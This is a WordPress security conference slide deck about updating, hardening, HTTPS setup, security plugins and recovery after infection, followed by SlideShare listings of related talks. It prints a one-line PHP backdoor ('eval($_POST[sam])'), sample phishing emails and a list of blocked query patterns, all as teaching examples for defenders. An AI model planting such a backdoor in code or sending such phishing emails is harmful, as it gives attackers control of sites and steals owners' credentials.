SlideShare a Scribd company logo
1 of 62
http://lynt.cz
WordPress Security:
Defend yourself against digital invaders
Vláďa Smitka
vladimir.smitka@lynt.cz
@smitka
Lynt services s.r.o.
Update!
Backup!
Be careful!
http://lynt.cz
WP leaks like a sieve
10. 7. 2016 2
Have you ever heard that?
Let's tell the truth.
http://lynt.cz10. 7. 2016 3
Updated / Obsolete
Web developers should push their customers to pay for
support and provide responsibly.
Customers should be willing to accept it – the website is
one of their empoyee in fact.
http://lynt.cz
What is the current status?
• Complex research of 65 000 czech sites 04/2015
10. 7. 2016 4
http://lynt.cz/blog/wordpress-in-the-czech-complex-research
WP versions
http://lynt.cz
Status 2 days ago (02/2016)
10. 7. 2016 5
16 639
WP versions – 02/2016
unknown
http://lynt.cz
Status 2 days ago
10. 7. 2016 6
3.7.13
247
3.8.13
1779
3.9.10
2229
4.0.10
2570
4.1.10
2946
4.2.7
4305
4.3.3
4695
4.4.2
15225
Still updated versions
http://lynt.cz
Status 2 days ago (02/2016)
10. 7. 2016 7
25 % WP sites run on 3.6 or lower – security updates are no longer provided
18 % WP sites on 3.7 or higher haven‘t installed the latest security updates yet
=At least 40 % of Czech WP sites contains security issues
Current version
27 %
Supported versions
with updates
30 %
Suported versions,
without updates
18%
Unsupported
versions
28%
WP versions recency
http://lynt.cz
What does it mean?
• I ran the annual WordCamp HACK campaign!
• Almost 1000 reports about critical
vulnerabilities or hacked sites were sent
• More than 300 vulnerable Slider Revolution
plugins discovered!
• A WordCamp invitation was included
• Responses from owners and developers of the
affected sites were less than warm…
10. 7. 2016 8
http://lynt.cz
How to manage updates?
• WP Updates Notifier plugin sends an e-mail when
an update is available
• Tools allowing bulk management:
– InfiniteWP
– ManageWP
– WP Remote
• How to turn on the auto-update feature (mu-
plugins):
add_filter( 'auto_update_plugin', '__return_true' );
add_filter( 'auto_update_theme', '__return_true' );
10. 7. 2016 9
http://lynt.cz
Infinite WP
• Self-hosted
• Base version for free (fully funcional, no limits)
• Just install InfiniteWP Client plugin + copy&paste credentials
10. 7. 2016 10
http://lynt.cz
UPDATE 05/2016
• MainWP – new self-hosted bulk management
system – looks very promising
10. 7. 2016 11
http://lynt.cz
Automated testing
• If you are afraid that something important breaks
after an update, it is possible to write automated
tests
• Casper.js
• Selenuium
• GhostPy
• Online services: http://www.testomato.com/,...
10. 7. 2016 12
http://lynt.cz
Hackers?
10. 7. 2016 13
http://lynt.cz
What the hell do they want?
• How do I know?
=> I analyzed many compromised systems + I
run Honey Pots
• http://pot.lynt.cz – it emulates an older WP
with some vulnerabilites and there is also a
fake SSH access
10. 7. 2016 14
http://lynt.cz
Honey Pot
• How long did it take from the launch of a new
machine to the first attacks?
10. 7. 2016 15
12 minutes
• The Internet is dangerous – accept this
fact and be prepared
http://lynt.cz
Ok, what do they want?
• Inject malicious code to infect visitors and to
show their ads
• Send a SPAM
• Attack other servers
• Gain sensitive data
• Shut down your site/the whole server
10. 7. 2016 16
http://lynt.cz
What does the uploaded evil code do?
10. 7. 2016 17
The first mention about Simple UDP
flood is from 2004:
https://forums.cpanel.net/threads/scr
ipt-in-tmp-made-by-hacker.33184/
The most simple backdoor:
eval($_POST[sam]);
Remote shell – e.g. b374k
Scripts to enable more attacks:
• Password cracking
• SPAM sending
• Script Simple UDP flood
http://lynt.cz
What methods do they use?
• Login
• Comments
• Particular bugs in
plugins, themes or WP
core
• Tapping
• Phishing
• Cross site infection
through other sites on a
shared hosting
10. 7. 2016 18
Prepared backdoors:
Hi, does anyone have an
experience with ### site?
They offer plugins just for
few bucks
They sell stolen plugins
without the license, you can
download them for free
somewhere on the Internet
http://lynt.cz
Cross infection
• Common problem on multihosting
10. 7. 2016 19
Folderwithallsites
Web1
Web2
Web3
http://lynt.cz
How to login into WP?
• /wp-admin + user name & password
• XML-RPC (/xmlrpc.php)
• Cookie
• REST-API (/wp-json) – coming soon
10. 7. 2016 20
http://lynt.cz
Harvesting user logins
• /?author=1 => /author/admin/
• Password admin, admin0, admin1,… Brute
force
Rules into .htaccess:
RewriteCond %{QUERY_STRING} author=
RewriteRule ^(.*)$ http://uckf.you? [L,R=301]
10. 7. 2016 21
http://lynt.cz
A hacker can tap your credentials
10. 7. 2016 22
http://lynt.cz
…or ask you directly
Subject: A security problem on wordcamp.cz
Date: Sat, 20 FEB 2016 09:51:48 +0200
From: HOSTING <your@amazing.hosting>
To: <you>
Dear customer,
Your website wordcamp.cz running on WordPress contains a serious security problem in the „Some
Amazing Plugin“ which enables to gain full control over your website and attack other sites
consequently.
There is no official patch available yet but our team can fix the issue manually. For this purpose we need
your credentials to your WP administration.
Send them ASAP to stop the attacks. Otherwise we will be forced to turn off your site.
Regards,
Your Amazing Hosting, Inc.
10. 7. 2016 23
http://lynt.cz
XML RPC
• /xmlrpc.php
• This protocol allows remote control of your site from various
applications – e.g. post publishing
• The protocol is used rarely
• But some plugins use it – JetPack
• system.multicall function which allowed an attacker to test
hundreds of passwords with one call (disclosured and fixed in
September 2015)
• If you want to use XML RPC, allow it only form particular IP
addresses
10. 7. 2016 24
Block via .htaccess
<Files "xmlrpc.php">
Order Allow,Deny
deny from all
</Files>
http://lynt.cz
Cookie
10. 7. 2016 25
http://lynt.cz
Cookie
wordpress_9338f7bf999516f89fdc070299cf0b82=admin
%7C1456673124%7COB8LpfMl7ZqlMm1zuN23LMBGOna
0IdLmz4g7JQBwtYn%7Cb73f661495e9323a6df2dffe8001
5360b41ed8970a5cf05dd4053aecc4109a40
10. 7. 2016 26
• md5(URL) = http://pot.lynt.cz
• User name
• Validity = 28.2.2016 15:25:24 (+14 days)
• Hash – AUTH_KEY + AUTH_SALT + 4 chars from password‘s hash
• Token (od 4.0) hash 43 random chars
http://lynt.cz
Crypto keys in wp-config.php
define('AUTH_KEY', 'put your unique phrase here');
define('SECURE_AUTH_KEY', 'put your unique phrase here');
define('LOGGED_IN_KEY', 'put your unique phrase here');
define('NONCE_KEY', 'put your unique phrase here');
define('AUTH_SALT', 'put your unique phrase here');
define('SECURE_AUTH_SALT', 'put your unique phrase here');
define('LOGGED_IN_SALT', 'put your unique phrase here');
define('NONCE_SALT', 'put your unique phrase here');
You can obtain new ones from:
https://api.wordpress.org/secret-key/1.1/salt/
The HACK campaing discovered that 16 % of sites with a vulnerability in Slider Revolution also used default
crypt keys.
If you install WP via wp-config-sample.php renaming, don‘t forget to change the crypto keys!
10. 7. 2016 27
http://lynt.cz
WordPress 4.0+
10. 7. 2016 28
You can invalidate the „remember me“ token and log off all users
36 % WP websites uses older version
User profile:
http://lynt.cz
Cookie tapping
10. 7. 2016 29
Na rozdíl od jména a hesla, se cookie posílají stále.
http://lynt.cz
Higher rights – higher risks
10. 7. 2016 30
• Subscriber
– Can read posts, edit their profile. The main benefit is easier commenting.
• Contributor
– Can write new posts but can‘t publish them (Editor or Administrator have to
publish them). Doesn‘t have access to the Media Gallery (can embed images
form external sources) – useful for guest blogging.
• Author
– Can manage their posts, manage comments on these posts. Had access to the
Media Gallery. Can‘t manage pages.
• Editor
– Can manage all content – posts, pages, comments, categories. Can use
javascript in comments.
• Administrator
– All rights – content, plugins, themes, widgets, menus. A good practice is not to
create content with the admin account.
• SuperAdministrator (only in WP multisite) – manages the network
http://lynt.cz
Privileges customization
• Rights are editable – e.g. If a person needs to
change the menu, they don‘t need the admin
rights:
• Use plugin User Role Editor
• Or use a similar code:
10. 7. 2016 31
https://codex.wordpress.org/Roles_and_Capabilities
$role_object = get_role( 'editor' );
$role_object->add_cap( 'edit_theme_options' );
http://lynt.cz
HTTPS
• SSL cerificates are cheap (finally):
• < 8 $/year – e.g. ssls.cz
• Free – Let‘s Encrypt
(needs support on server)
• 2 options
– Whole web on HTTPS (better)
– Only administration on HTTPS
10. 7. 2016 32
git clone https://github.com/letsencrypt/letsencrypt /opt/letsencrypt
./letsencrypt-auto --apache -d <my-web> -d www. <my-web>
Obnovovací skript: http://do.co/le-renew (le-renew <my-web>)
http://lynt.cz
Deploy HTTPS – whole web
• Ask your host/admin to set up the certificate
• Try if it works
• Settings - General
10. 7. 2016 33
You can set up it also in the wp-config.php,
- it saves DB queries:
define('WP_HOME', 'https://<my-web>');
define('WP_SITEURL', 'http://<my-web>');
• There is a problem with the mixed content – WP makes absolute links – you
need to fix it
• SSL Insecure Content Fixer
• Fix in admin – one by one
• Fix in DB:
UPDATE wp_posts SET post_content = REPLACE(post_content,
'http://<my-web>', 'https://<my-web>')
http://lynt.cz
Deploy HTTPS – administration only
Place this code into wp-config.php:
define( 'FORCE_SSL_ADMIN', true );
There is a problem with the mixed content in the Media Gallery:
SSL Insecure Content Fixer + the „Simple“ settings
10. 7. 2016 34
http://lynt.cz10. 7. 2016 35
Fixes CSS, JS
and Images
in the Media
Gallery
Fixes
incorrect
URLs in the
content
SSL Insecure Content - settings
http://lynt.cz
Redirect from HTTP to HTTPS
In .htaccess:
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{SERVER_PORT} !^443$
RewriteRule (.*) https://%{HTTP_HOST}%{REQUEST_URI} [R,L]
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
10. 7. 2016 36
* May differ on some hostings
http://lynt.cz
Other encrypted protocols
• SFTP/SCP instead FTP
• SSH instead Telnet
• IMAPs (POP3s) instead IMAP (POP3)
• SMTP TLS/SMTP STARTTLS instead SMTP
• VPN
10. 7. 2016 37
http://lynt.cz
How does the attack proceed?
• Check publicly known information (domain
owners, e-mail addresses, IPs, employees‘
names… recon-ng)
• Active scan, identification - WP-scan
• Agressive scan – e.g. DirBuster (tries if
particular folders exist - /phpmyadmin/,…)
• Vulnerabilities tests – generate suspicious
queries
• Can be detected - causes many 404
10. 7. 2016 38
http://lynt.cz
XSS
10. 7. 2016 39
http://lynt.cz
XSS – worse
10. 7. 2016 40
http://lynt.cz
XSS – really dangerous
10. 7. 2016 41
Overlay reacts on mouse movement:
onMouseMove
Edit Themes
http://lynt.cz
XSS – at its maximum
10. 7. 2016 42
http://lynt.cz
Ask admin for help
Subject: A security problem on wordcamp.cz
Date: Sat, 20 FEB 2016 09:59:02 +0200
From: HOSTING <your@amazing.hosting>
To: <you>
Dear customer,
Your website wordcamp.cz running on WordPress contains a serious security problem in the „Some
Amazing Plugin“ which enables to gain full control over your website and attack other sites
consequently.
You need to disable the funcion „Uglyness “ until a patch is available – you can do so simply via
following link:
http://<your-web>/wp-content/plugins/amazing-plugin/abc.php?xy=dG9obGUgamUgemx5IGtvZCA6LSk
Please disable the function or delete the plugin, otherwise we will be forced to turn off your site.
Regards,
Your Amazing Hosting, Inc.
10. 7. 2016 43
http://lynt.cz
Cross-site request forgery
• When the system doesn‘t check the origin of the request
10. 7. 2016 44
Hi Admin, check
this cool site!
Cool site
Lorem ipsum
/create new user for the attacker
• The prevention are the „signed“ forms (there is a unique token
added by server and checked after the submision)
• WP uses „nonces“ (no all plugins use them…)
/wp-admin/post.php?post=1&action=trash&_wpnonce=b192fc4204
http://lynt.cz
SQL Injection
• Unsanitized inputs (again)
• It is possible to modify DB queries and
consequently obtain the complete data from DB
• Interesting stuff in the DB:
– E-mails
– User names, hashed passwords
– Auth Token for autologin Cookie
– Credentials to external services
10. 7. 2016 45
http://lynt.cz
Security plugins
• My favourite combo:
• WordFence + BBQ: Bad Block Queries
• Blocks invalid login attempts
• Limits scans
• File changes detection
• Denies user logins harvesting
• Denies PHP execution in uploads
• Limits SPAM
• Accesses to the global attackers list
• Filters out the suspicious queries
10. 7. 2016 46
http://lynt.cz10. 7. 2016 47
http://lynt.cz
WordFence – after installation
10. 7. 2016 48
Level 2: more notifications, limiting invalid logins
Level 3: starts with the traffic limiting
Level 4: blocks invalid login names immediately
http://lynt.cz
WordFence – Live Traffic
10. 7. 2016 49
http://lynt.cz
WordFence – file changes detection
10. 7. 2016 50
http://lynt.cz
WordFence – traffic limiting
10. 7. 2016 51
http://lynt.cz
WordFence – login security
10. 7. 2016 52
http://lynt.cz
WordFence – other options
10. 7. 2016 53
http://lynt.cz
WordFence – other options
10. 7. 2016 54
Great plugin but unfortunatelly it lacks blocking of suspicious queries
http://lynt.cz10. 7. 2016 55
Simple plugin, no configuration – blocks suspicious queries
E.g.: eval(, base64_, UNION * SELECT, wp-config.php, < …
http://lynt.cz
UPDATE 05/2016
• There is a new „Firewall“ feature in
WordFence since 6.1.1
• It blocks suspicious queries

10. 7. 2016 56
http://lynt.cz
Recovery after infection
• Stop the web (e.g. deny all in .htaccess)
• Remove everything, restore from clean backup/
manual disinfection if no clean backup available (FAR)
• Imitate the cause (usually update)
• Change FTP password
• Change DB password
• Change users‘ passwords, check unknown users
• New crypto keys into wp-config.php:
https://api.wordpress.org/secret-key/1.1/salt/
• Check files for changes and evil code (Wordfence,
Sucuri Scanner)
10. 7. 2016 57
http://lynt.cz
Inspiration – how do we protect our sites?
• wp-login.php only from the Czech Republic (GeoIP module)
• Blocked xmlrpc.php and some other files + disabled PHP in uploads
• Comments spam blocking (NoSpamNX) + Ping/Track Back filter (Topsy
Blocker)
• Bulk updates management
• Sites isolation
• HTTP headers:
– X-Frame-Options SAMEORIGIN;
– X-XSS-Protection "1; mode=block"
– X-Content-Type-Options nosniff
• Deletion unused themes and plugins
10. 7. 2016 58
http://lynt.cz
Inspiration – how do we protect our sites?
• Fail2Ban (invalid login attempts, too many 404,
https://wordpress.org/plugins/wp-fail2ban/ )
• Suspicious queries filtering (serverside)
• Realtime log (Log Stash) and error (Sentry) analysis
• Server monitoring (Zabbix)
• File changes detection + malware analysis – Maldet + Yara
• Daily serverside backups (plugins can be used as well: BackWPup,
UpdraftPlus, BackupBuddy)
• Watch current resources about new threats
10. 7. 2016 59
http://lynt.cz
Resources
• Information about vulnerabilities
• https://www.owasp.org/
• https://wpvulndb.com/
• https://blog.sucuri.net/
• https://www.wordfence.com/blog/
• https://packetstormsecurity.com/
• https://www.reddit.com/r/xss
• My presentation from last year:
• http://www.slideshare.net/vsmitka/wordpress-security-for-
everone
10. 7. 2016 60
http://lynt.cz
Homework for tomorrow
□ Check unique crypto keys in the wp-config.php
□ Create backup
□ Remove unused plugins
□ Remove all unused themes (you can keep one
of the default themes and the parent theme)
□ Lower user rights
□ Update everything
10. 7. 2016 61
http://lynt.cz
Thank you for your attention
10. 7. 2016 62
Update, backup, use a security plugin, be careful

More Related Content

What's hot

MySQL Tips for WordPress
MySQL Tips for WordPressMySQL Tips for WordPress
MySQL Tips for WordPress
dsero
 

What's hot (20)

MySQL Tips for WordPress
MySQL Tips for WordPressMySQL Tips for WordPress
MySQL Tips for WordPress
 
Less and faster – Cache tips for WordPress developers
Less and faster – Cache tips for WordPress developersLess and faster – Cache tips for WordPress developers
Less and faster – Cache tips for WordPress developers
 
I'm in ur browser, pwning your stuff - Attacking (with) Google Chrome Extensions
I'm in ur browser, pwning your stuff - Attacking (with) Google Chrome ExtensionsI'm in ur browser, pwning your stuff - Attacking (with) Google Chrome Extensions
I'm in ur browser, pwning your stuff - Attacking (with) Google Chrome Extensions
 
Securing Your WordPress Website - WordCamp GC 2011
Securing Your WordPress Website - WordCamp GC 2011Securing Your WordPress Website - WordCamp GC 2011
Securing Your WordPress Website - WordCamp GC 2011
 
Advanced Chrome extension exploitation
Advanced Chrome extension exploitationAdvanced Chrome extension exploitation
Advanced Chrome extension exploitation
 
Search in WordPress - how it works and howto customize it
Search in WordPress - how it works and howto customize itSearch in WordPress - how it works and howto customize it
Search in WordPress - how it works and howto customize it
 
Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)
 
10 things every developer should know about their database to run word press ...
10 things every developer should know about their database to run word press ...10 things every developer should know about their database to run word press ...
10 things every developer should know about their database to run word press ...
 
Use Xdebug to profile PHP
Use Xdebug to profile PHPUse Xdebug to profile PHP
Use Xdebug to profile PHP
 
Secure Your Wordpress
Secure Your WordpressSecure Your Wordpress
Secure Your Wordpress
 
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
 Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
 
HTTPS + Let's Encrypt
HTTPS + Let's EncryptHTTPS + Let's Encrypt
HTTPS + Let's Encrypt
 
HTTPS and HTTP/2
HTTPS and HTTP/2HTTPS and HTTP/2
HTTPS and HTTP/2
 
Integrity protection for third-party JavaScript
Integrity protection for third-party JavaScriptIntegrity protection for third-party JavaScript
Integrity protection for third-party JavaScript
 
Nahlédněte za oponu VersionPressu
Nahlédněte za oponu VersionPressuNahlédněte za oponu VersionPressu
Nahlédněte za oponu VersionPressu
 
Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)
 
Defeating Cross-Site Scripting with Content Security Policy (updated)
Defeating Cross-Site Scripting with Content Security Policy (updated)Defeating Cross-Site Scripting with Content Security Policy (updated)
Defeating Cross-Site Scripting with Content Security Policy (updated)
 
Securing your web infrastructure
Securing your web infrastructureSecuring your web infrastructure
Securing your web infrastructure
 
Managing Multisite: Lessons from a Large Network
Managing Multisite: Lessons from a Large NetworkManaging Multisite: Lessons from a Large Network
Managing Multisite: Lessons from a Large Network
 
Dark Fairytales from a Phisherman (Vol. II)
Dark Fairytales from a Phisherman (Vol. II)Dark Fairytales from a Phisherman (Vol. II)
Dark Fairytales from a Phisherman (Vol. II)
 

Viewers also liked

Viewers also liked (20)

Wordfence 2016
Wordfence 2016Wordfence 2016
Wordfence 2016
 
WordPress: Základy - bezpečnost 3x3
WordPress: Základy - bezpečnost 3x3WordPress: Základy - bezpečnost 3x3
WordPress: Základy - bezpečnost 3x3
 
Nejčastejší problémy WordPress webů
Nejčastejší problémy WordPress webůNejčastejší problémy WordPress webů
Nejčastejší problémy WordPress webů
 
WP výkon a jeho profilování
WP výkon a jeho profilováníWP výkon a jeho profilování
WP výkon a jeho profilování
 
WordCamp Praha 2016 - Bezpečnost WordPress
WordCamp Praha 2016 - Bezpečnost WordPressWordCamp Praha 2016 - Bezpečnost WordPress
WordCamp Praha 2016 - Bezpečnost WordPress
 
Word campktm speed-security
Word campktm speed-securityWord campktm speed-security
Word campktm speed-security
 
Wordpress Security Top 10 Protections
Wordpress Security Top 10 ProtectionsWordpress Security Top 10 Protections
Wordpress Security Top 10 Protections
 
WordPress Security - The "No-BS" Version
WordPress Security - The "No-BS" VersionWordPress Security - The "No-BS" Version
WordPress Security - The "No-BS" Version
 
Instalace WordPress
Instalace WordPressInstalace WordPress
Instalace WordPress
 
WordPress Security for Beginners
WordPress Security for BeginnersWordPress Security for Beginners
WordPress Security for Beginners
 
WordPress Security 101 – WordCamp Finland 2016 presentation by Otto Kekäläine...
WordPress Security 101 – WordCamp Finland 2016 presentation by Otto Kekäläine...WordPress Security 101 – WordCamp Finland 2016 presentation by Otto Kekäläine...
WordPress Security 101 – WordCamp Finland 2016 presentation by Otto Kekäläine...
 
Jednoduchý firemní web na WordPressu - WordCamp Praha 2014
Jednoduchý firemní web na WordPressu - WordCamp Praha 2014Jednoduchý firemní web na WordPressu - WordCamp Praha 2014
Jednoduchý firemní web na WordPressu - WordCamp Praha 2014
 
České weby a Wordpress (Q4/2014)
České weby a Wordpress (Q4/2014)České weby a Wordpress (Q4/2014)
České weby a Wordpress (Q4/2014)
 
Výkon WordPress
Výkon WordPressVýkon WordPress
Výkon WordPress
 
Wordcamp Praha 2014
Wordcamp Praha 2014Wordcamp Praha 2014
Wordcamp Praha 2014
 
Now That's What I Call WordPress Security 2010
Now That's What I Call WordPress Security 2010Now That's What I Call WordPress Security 2010
Now That's What I Call WordPress Security 2010
 
Licence k šablonám a pluginům - WordCamp 2014 Praha
Licence k šablonám a pluginům - WordCamp 2014 PrahaLicence k šablonám a pluginům - WordCamp 2014 Praha
Licence k šablonám a pluginům - WordCamp 2014 Praha
 
Základní nastavení wordpressu
Základní nastavení wordpressuZákladní nastavení wordpressu
Základní nastavení wordpressu
 
Word press pluginy (pokročilé) - Tomáš Cirkl
Word press pluginy (pokročilé) - Tomáš CirklWord press pluginy (pokročilé) - Tomáš Cirkl
Word press pluginy (pokročilé) - Tomáš Cirkl
 
WCBham Beginner WordPress Security
WCBham Beginner WordPress SecurityWCBham Beginner WordPress Security
WCBham Beginner WordPress Security
 

Similar to WordPress Security: Defend yourself against digital invaders

EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdfEN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
GiorgiRcheulishvili
 
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Jeremiah Grossman
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecurities
amiable_indian
 

Similar to WordPress Security: Defend yourself against digital invaders (20)

BeEF_EUSecWest-2012_Michele-Orru
BeEF_EUSecWest-2012_Michele-OrruBeEF_EUSecWest-2012_Michele-Orru
BeEF_EUSecWest-2012_Michele-Orru
 
WordPress Performance
WordPress PerformanceWordPress Performance
WordPress Performance
 
Are we security yet
Are we security yetAre we security yet
Are we security yet
 
Workshop KrakYourNet2016 - Web applications hacking Ruby on Rails example
Workshop KrakYourNet2016 - Web applications hacking Ruby on Rails example Workshop KrakYourNet2016 - Web applications hacking Ruby on Rails example
Workshop KrakYourNet2016 - Web applications hacking Ruby on Rails example
 
RoR Workshop - Web applications hacking - Ruby on Rails example
RoR Workshop - Web applications hacking - Ruby on Rails exampleRoR Workshop - Web applications hacking - Ruby on Rails example
RoR Workshop - Web applications hacking - Ruby on Rails example
 
2023-May.pptx
2023-May.pptx2023-May.pptx
2023-May.pptx
 
DEF CON 27 - BEN SADEGHIPOUR - owning the clout through ssrf and pdf generators
DEF CON 27 - BEN SADEGHIPOUR  - owning the clout through ssrf and pdf generatorsDEF CON 27 - BEN SADEGHIPOUR  - owning the clout through ssrf and pdf generators
DEF CON 27 - BEN SADEGHIPOUR - owning the clout through ssrf and pdf generators
 
5 年後還是新手 - WordPress Plugin 開發大冒險 - GOTY
5 年後還是新手 - WordPress Plugin 開發大冒險 - GOTY5 年後還是新手 - WordPress Plugin 開發大冒險 - GOTY
5 年後還是新手 - WordPress Plugin 開發大冒險 - GOTY
 
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdfEN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
 
Rails security: above and beyond the defaults
Rails security: above and beyond the defaultsRails security: above and beyond the defaults
Rails security: above and beyond the defaults
 
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
 
Cloud Device Insecurity
Cloud Device InsecurityCloud Device Insecurity
Cloud Device Insecurity
 
CONFidence 2015: The Top 10 Web Hacks of 2014 - Matt Johansen, Johnathan Kuskos
CONFidence 2015: The Top 10 Web Hacks of 2014 - Matt Johansen, Johnathan KuskosCONFidence 2015: The Top 10 Web Hacks of 2014 - Matt Johansen, Johnathan Kuskos
CONFidence 2015: The Top 10 Web Hacks of 2014 - Matt Johansen, Johnathan Kuskos
 
PHP on Windows
PHP on WindowsPHP on Windows
PHP on Windows
 
PHP on Windows
PHP on WindowsPHP on Windows
PHP on Windows
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecurities
 
Top 10 Web Hacks 2012
Top 10 Web Hacks 2012Top 10 Web Hacks 2012
Top 10 Web Hacks 2012
 
Romulus OWASP
Romulus OWASPRomulus OWASP
Romulus OWASP
 
526_topic08.ppt
526_topic08.ppt526_topic08.ppt
526_topic08.ppt
 
gofortution
gofortutiongofortution
gofortution
 

More from Vladimír Smitka

More from Vladimír Smitka (20)

Google Tag Manager a analytika ve WordPress
Google Tag Manager a analytika ve WordPressGoogle Tag Manager a analytika ve WordPress
Google Tag Manager a analytika ve WordPress
 
WordCamp Bratislava 2019 - Cache!
WordCamp Bratislava 2019 - Cache!WordCamp Bratislava 2019 - Cache!
WordCamp Bratislava 2019 - Cache!
 
Webmeetup #3
Webmeetup #3Webmeetup #3
Webmeetup #3
 
Co ukázal globální scan přístupných .git repozitářů?
Co ukázal globální scan přístupných .git repozitářů?Co ukázal globální scan přístupných .git repozitářů?
Co ukázal globální scan přístupných .git repozitářů?
 
Hesla a vícefaktorová autentizace ve WP
Hesla a vícefaktorová autentizace ve WPHesla a vícefaktorová autentizace ve WP
Hesla a vícefaktorová autentizace ve WP
 
WP Weekend 2018
WP Weekend 2018WP Weekend 2018
WP Weekend 2018
 
Drobné chyby, které vám mohou zlomit vaz
Drobné chyby, které vám mohou zlomit vazDrobné chyby, které vám mohou zlomit vaz
Drobné chyby, které vám mohou zlomit vaz
 
Sysops tipy pro lepší WP
Sysops tipy pro lepší WPSysops tipy pro lepší WP
Sysops tipy pro lepší WP
 
Najčastejšie problémy WordPress webov
Najčastejšie problémy WordPress webovNajčastejšie problémy WordPress webov
Najčastejšie problémy WordPress webov
 
Http/2 vs Image Sprites
Http/2 vs Image SpritesHttp/2 vs Image Sprites
Http/2 vs Image Sprites
 
Ansible
AnsibleAnsible
Ansible
 
WordCamp Brno 2017 - rychlý a bezpečný web
WordCamp Brno 2017  - rychlý a bezpečný webWordCamp Brno 2017  - rychlý a bezpečný web
WordCamp Brno 2017 - rychlý a bezpečný web
 
WordPress - základy bezpečnosti
WordPress - základy bezpečnostiWordPress - základy bezpečnosti
WordPress - základy bezpečnosti
 
Bezpečnost WordPress pro začátečníky
Bezpečnost WordPress pro začátečníkyBezpečnost WordPress pro začátečníky
Bezpečnost WordPress pro začátečníky
 
Bezpečnost WP, tipy pro každého - wordCamp Praha 2015
Bezpečnost WP, tipy pro každého - wordCamp Praha 2015Bezpečnost WP, tipy pro každého - wordCamp Praha 2015
Bezpečnost WP, tipy pro každého - wordCamp Praha 2015
 
Wordcamp Praha 2015 - další útržky z prezentace
Wordcamp Praha 2015 - další útržky z prezentaceWordcamp Praha 2015 - další útržky z prezentace
Wordcamp Praha 2015 - další útržky z prezentace
 
Dijskrův algoritmus
Dijskrův algoritmusDijskrův algoritmus
Dijskrův algoritmus
 
Bezpečnost Wordpressu - 4. WP konference
Bezpečnost Wordpressu - 4. WP konferenceBezpečnost Wordpressu - 4. WP konference
Bezpečnost Wordpressu - 4. WP konference
 
Sítě pro malé a střední podniky 2014
Sítě pro malé a střední podniky 2014Sítě pro malé a střední podniky 2014
Sítě pro malé a střední podniky 2014
 
Jak si (ne)nechat hacknout Wordpress stránky
Jak si (ne)nechat hacknout Wordpress stránkyJak si (ne)nechat hacknout Wordpress stránky
Jak si (ne)nechat hacknout Wordpress stránky
 

Recently uploaded

Recently uploaded (20)

Where to Learn More About FDO _ Richard at FIDO Alliance.pdf
Where to Learn More About FDO _ Richard at FIDO Alliance.pdfWhere to Learn More About FDO _ Richard at FIDO Alliance.pdf
Where to Learn More About FDO _ Richard at FIDO Alliance.pdf
 
Free and Effective: Making Flows Publicly Accessible, Yumi Ibrahimzade
Free and Effective: Making Flows Publicly Accessible, Yumi IbrahimzadeFree and Effective: Making Flows Publicly Accessible, Yumi Ibrahimzade
Free and Effective: Making Flows Publicly Accessible, Yumi Ibrahimzade
 
Strategic AI Integration in Engineering Teams
Strategic AI Integration in Engineering TeamsStrategic AI Integration in Engineering Teams
Strategic AI Integration in Engineering Teams
 
Connecting the Dots in Product Design at KAYAK
Connecting the Dots in Product Design at KAYAKConnecting the Dots in Product Design at KAYAK
Connecting the Dots in Product Design at KAYAK
 
Speed Wins: From Kafka to APIs in Minutes
Speed Wins: From Kafka to APIs in MinutesSpeed Wins: From Kafka to APIs in Minutes
Speed Wins: From Kafka to APIs in Minutes
 
Enterprise Knowledge Graphs - Data Summit 2024
Enterprise Knowledge Graphs - Data Summit 2024Enterprise Knowledge Graphs - Data Summit 2024
Enterprise Knowledge Graphs - Data Summit 2024
 
10 Differences between Sales Cloud and CPQ, Blanka Doktorová
10 Differences between Sales Cloud and CPQ, Blanka Doktorová10 Differences between Sales Cloud and CPQ, Blanka Doktorová
10 Differences between Sales Cloud and CPQ, Blanka Doktorová
 
Secure Zero Touch enabled Edge compute with Dell NativeEdge via FDO _ Brad at...
Secure Zero Touch enabled Edge compute with Dell NativeEdge via FDO _ Brad at...Secure Zero Touch enabled Edge compute with Dell NativeEdge via FDO _ Brad at...
Secure Zero Touch enabled Edge compute with Dell NativeEdge via FDO _ Brad at...
 
What's New in Teams Calling, Meetings and Devices April 2024
What's New in Teams Calling, Meetings and Devices April 2024What's New in Teams Calling, Meetings and Devices April 2024
What's New in Teams Calling, Meetings and Devices April 2024
 
ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...
ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...
